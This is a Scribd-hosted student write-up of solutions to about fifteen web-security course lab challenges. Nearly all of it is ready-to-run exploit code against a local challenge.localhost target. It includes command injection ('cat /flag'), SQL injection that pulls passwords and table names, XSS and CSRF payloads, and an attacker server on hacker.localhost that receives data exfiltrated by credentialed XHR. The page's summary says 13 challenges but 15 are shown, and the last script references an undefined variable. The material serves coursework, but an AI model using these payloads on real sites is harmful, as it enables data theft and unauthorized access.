Scribd
Upload
823 views12 pages

Web Security WriteUp 3 PDF

This document outlines 13 challenges for a web security course. Each challenge provides instructions for running code to exploit a vulnerability on a target website. The code examples show how to make unauthorized requests, inject code, and extract hidden flags or data.

Uploaded by

jjoseph3703
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
823 views12 pages

Web Security WriteUp 3 PDF

This document outlines 13 challenges for a web security course. Each challenge provides instructions for running code to exploit a vulnerability on a target website. The code examples show how to make unauthorized requests, inject code, and extract hidden flags or data.

Uploaded by

jjoseph3703
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 12

CSE 365 - Web Security

Challenge 1)
1. Run the challenge using /challenge/run

2. Run ipython using in a split terminal, enter the following commands into ipython one
by one

import requests
requests.get("http://challenge.localhost/?path=/flag").text

Challenge 2)
1. Run the challenge using /challenge/run

2. Run ipython using in a split terminal, enter the following commands into ipython one
by one

import requests
requests.get("http://challenge.localhost:80/?timezone=UTC%3Bcat /flag%3B").text

Challenge 3)
1. Run the challenge using /challenge/run

2. Open a python file and run the following code using python <filename>.py

import requests
URL = "http://challenge.localhost:80/?user=1"

CSE 365 - Web Security 1


r = requests.get(url = URL)
print(r.content)

Challenge 4)
1. Run the challenge using /challenge/run

2. Open a python file and run the following code using python <filename>.py

import requests
form = {
"username" : 'flag" --',
"password" : "idk",
}
response = requests.post("http://challenge.localhost/", data=form)
print(response,"\n",response.text)

Challenge 5)
1. Run the challenge using /challenge/run

2. Open a python file and run the following code using python <filename>.py

import requests

params = {
"query": '" UNION SELECT password FROM users --'
}
response = requests.post("http://challenge.localhost/", params=params)
print(response.text)

Challenge 6)
1. Run the challenge using /challenge/run

CSE 365 - Web Security 2


2. Open a python file and run the following code using python <filename>.py

import requests
URL = "http://challenge.localhost:80/"
PARAMS = {'query': '" UNION SELECT tbl_name FROM sqlite_master; --'}
r = requests.get(url = URL, params = PARAMS)
print(r.content)

3. You will then have to run the next part of script you can either replace your current
file or make a new file as I did in the screenshot (however that was just for
demonstration purposes) all you have to change in this file is where it says TABLE
NAME

import requests
URL = "http://challenge.localhost:80/"
PARAMS = {'query': '" UNION SELECT password FROM TABLE NAME; --'}
r = requests.get(url = URL, params = PARAMS)
print(r.content)

4. Here is a screenshot that might clear things up

CSE 365 - Web Security 3


Challenge 7)
1. Run the challenge using /challenge/run

2. Open a python file and run the following code using python <filename>.py

import requests

data = {"username": "flag", "password": '" UNION SELECT password, * FROM users --'}
response = requests.post("http://challenge.localhost/", data=data)
print(response.text)

Challenge 8)
1. Run the challenge using /challenge/run

2. Open a python file and run the following code using python <filename>.py

import requests

base_url = "http://challenge.localhost"

payload = '<html><script>alert(1)</script></html>'
visit_url = f"{base_url}/visit?url={base_url}/echo?echo={payload}"

response = requests.get(visit_url)
print(response.text)

Challenge 9)
1. Run the challenge using /challenge/run

2. Open a python file and run the following code using python <filename>.py

import requests
import urllib.parse

CSE 365 - Web Security 4


base_url = "http://challenge.localhost"

payload = '</textarea><html><script>alert(1)</script></html><textarea>'
encoded_payload = urllib.parse.quote(payload)
visit_url = f"{base_url}/visit?url={base_url}/echo?echo={encoded_payload}"

response = requests.get(visit_url)
print(response.text)

Challenge 10)
1. Run the challenge using /challenge/run

2. Open a python file and run the following code using python <filename>.py

import requests

base_url = "http://challenge.localhost"

visit_leak_url = f"{base_url}/visit?url={base_url}/leak"
response = requests.get(visit_leak_url)

if response.status_code == 200:
info_url = f"{base_url}/info?user=1"
response = requests.get(info_url)
print(response.text)
else:
print("Failed to set leaked variable")

Challenge 11)
1. Run the challenge using /challenge/run

2. Open a python file and run the following code using python <filename>.py

from flask import Flask, redirect


app = Flask(__name__)
@app.route('/')
def hello():

CSE 365 - Web Security 5


return redirect("http://challenge.localhost/leak")

if __name__ == '__main__':
port = 81
app.run("hacker.localhost", 8080)

2. Then run the next python file

import requests
from requests import Session
s = Session()

response = s.get("http://challenge.localhost/visit?url=http://hacker.localhost:8080/")
print(response.text)

flag_response=s.get("http://challenge.localhost/info?user=1")
print(flag_response.text)

3. Here is a screenshot if you are confused

Challenge 12)
1. Run the challenge using /challenge/run

CSE 365 - Web Security 6


2. Run the following commands in the terminal one by one, basically you will be
creating a folder and making some files in it

mkdir challenge12
cd challenge12
mkdir templates
cd templates
touch lvl12.py
touch f12.py
touch index.html

3. You will have to open the folder you created (challenge12) using vscode’s menu in
the top left, file > open folder > hacker/challenge12

3. In the first python file add the following code

from flask import Flask, redirect,render_template


app = Flask(__name__)
@app.route('/')
def index():
return render_template("index.html")
port = 81
app.run("hacker.localhost",8000)

4. In the second python file add the following code

import requests
from requests import Session
s = Session()

response = s.get("http://challenge.localhost/visit?url=http://hacker.localhost:8000/")
print(response.text)

CSE 365 - Web Security 7


flag_response = s.get("http://challenge.localhost/info?user=1")
print(flag_response.text)

5. In the html file add the following code

<script>
var xhttp = new XMLHttpRequest();
xhttp.open("POST","http://challenge.localhost/leak", true);
xhttp.withCredentials = true;
xhttp.send();
</script>

6. When you are done you should have something like this

7. Optional:

Challenge 13)
1. Run the challenge using /challenge/run

2. Open a python file and run the following code using python <filename>.py

CSE 365 - Web Security 8


from http.server import SimpleHTTPRequestHandler, HTTPServer

class WebHandler(SimpleHTTPRequestHandler):
def handle_request(self):
# Print client headers
print('\n' + str(self.headers).strip() + '\n')

# Print client data


contentLength = int(self.headers.get("Content-Length", 0))
if contentLength:
print(self.rfile.read(contentLength))
print()

self.send_response(200)
self.end_headers()

def do_OPTIONS(self):
self.send_response(200)

def do_GET (self):


self.handle_request()

response = """<html>
<script>
let xhr = new XMLHttpRequest();
xhr.open("GET", `http://challenge.localhost:80/info`, false);
xhr.withCredentials = true;
xhr.send();
let flag = xhr.responseText;

xhr = new XMLHttpRequest();


xhr.open("POST", `http://hacker.localhost:1337/flag`, false);
xhr.send(flag);
</script>
</html>
"""
self.wfile.write(bytes(response, "utf-8"))

def do_POST(self):
self.handle_request()

response = ""

self.wfile.write(bytes(response, "utf-8"))

server_address = ("127.0.0.1", 1337)


server = HTTPServer(server_address, WebHandler)
server.serve_forever()

3. Run the following command after the python file executes

CSE 365 - Web Security 9


curl http://challenge.localhost:80/visit?url=https%3A%2F%2Ffanyv88.com%3A443%2Fhttp%2Fchallenge.localhost%3A80%2Fecho%
3Fecho%3D%253Cscript%253E%2Blet%2Bxhr%2B%253D%2Bnew%2BXMLHttpRequest%2528%2529%253B%2Bxhr.
open%2528%2522GET%2522%252C%2B%2560http%253A%252F%252Fchallenge.localhost%253A80%252Finfo%
2560%252C%2Bfalse%2529%253B%2Bxhr.withCredentials%2B%253D%2Btrue%253B%2Bxhr.send%2528%252
9%253B%2Blet%2Bflag%2B%253D%2Bxhr.responseText%253B%2B%2Bxhr%2B%253D%2Bnew%2BXMLHttpReques
t%2528%2529%253B%2Bxhr.open%2528%2522POST%2522%252C%2B%2560http%253A%252F%252Fhacker.local
host%253A1337%252Fflag%2560%252C%2Bfalse%2529%253B%2Bxhr.send%2528flag%2529%253B%2B%253C%2
52Fscript%253E

Challenge 14)
1. Run the challenge using /challenge/run

2. Open a python file and run the following code using python <filename>.py (it’s the
same file as the last challenge)

from http.server import SimpleHTTPRequestHandler, HTTPServer

class WebHandler(SimpleHTTPRequestHandler):
def handle_request(self):
# Print client headers
print('\n' + str(self.headers).strip() + '\n')

# Print client data


contentLength = int(self.headers.get("Content-Length", 0))
if contentLength:
print(self.rfile.read(contentLength))
print()

self.send_response(200)
self.end_headers()

def do_OPTIONS(self):
self.send_response(200)

def do_GET (self):


self.handle_request()

response = """<html>
<script>
let xhr = new XMLHttpRequest();
xhr.open("GET", `http://challenge.localhost:80/info`, false);
xhr.withCredentials = true;
xhr.send();
let flag = xhr.responseText;

CSE 365 - Web Security 10


xhr = new XMLHttpRequest();
xhr.open("POST", `http://hacker.localhost:1337/flag`, false);
xhr.send(flag);
</script>
</html>
"""
self.wfile.write(bytes(response, "utf-8"))

def do_POST(self):
self.handle_request()

response = ""

self.wfile.write(bytes(response, "utf-8"))

server_address = ("127.0.0.1", 1337)


server = HTTPServer(server_address, WebHandler)
server.serve_forever()

3. Run the following command after the python file executes (this is not the same as
the last challenge)

curl http://challenge.localhost:80/visit?url=https%3A%2F%2Ffanyv88.com%3A443%2Fhttp%2Fchallenge.localhost%3A80%2Fecho%
3Fecho%3D%253Cscript%253E%2Blet%2Bxhr%2B%253D%2Bnew%2BXMLHttpRequest%2528%2529%253B%2Bxhr.
open%2528%2522GET%2522%252C%2B%2560http%253A%252F%252Fchallenge.localhost%253A80%252Finfo%
2560%252C%2Bfalse%2529%253B%2Bxhr.withCredentials%2B%253D%2Btrue%253B%2Bxhr.send%2528%252
9%253B%2Blet%2Bflag%2B%253D%2Bxhr.responseText%253B%2B%2Bxhr%2B%253D%2Bnew%2BXMLHttpReques
t%2528%2529%253B%2Bxhr.open%2528%2522POST%2522%252C%2B%2560http%253A%252F%252Fhacker.local
host%253A1337%252Fflag%2560%252C%2Bfalse%2529%253B%2Bxhr.send%2528flag%2529%253B%2B%253C%2
52Fscript%253E

Challenge 15)
1. Run the challenge using /challenge/run

2. Open a python file and run the following code using python <filename>.py

import requests
import pwn

response = requests.get("http://challenge.localhost/win_address%")
win_address = response.text.strip()

CSE 365 - Web Security 11


print(win_address)

response = requests.get("http://challenge.localhost/greet", params={"name": "A" + pwn.p64


(int(win_address, 16)).decode("latin")*200})

if "pwn" in response.text:
print(response.text)
print(i)

CSE 365 - Web Security 12

You might also like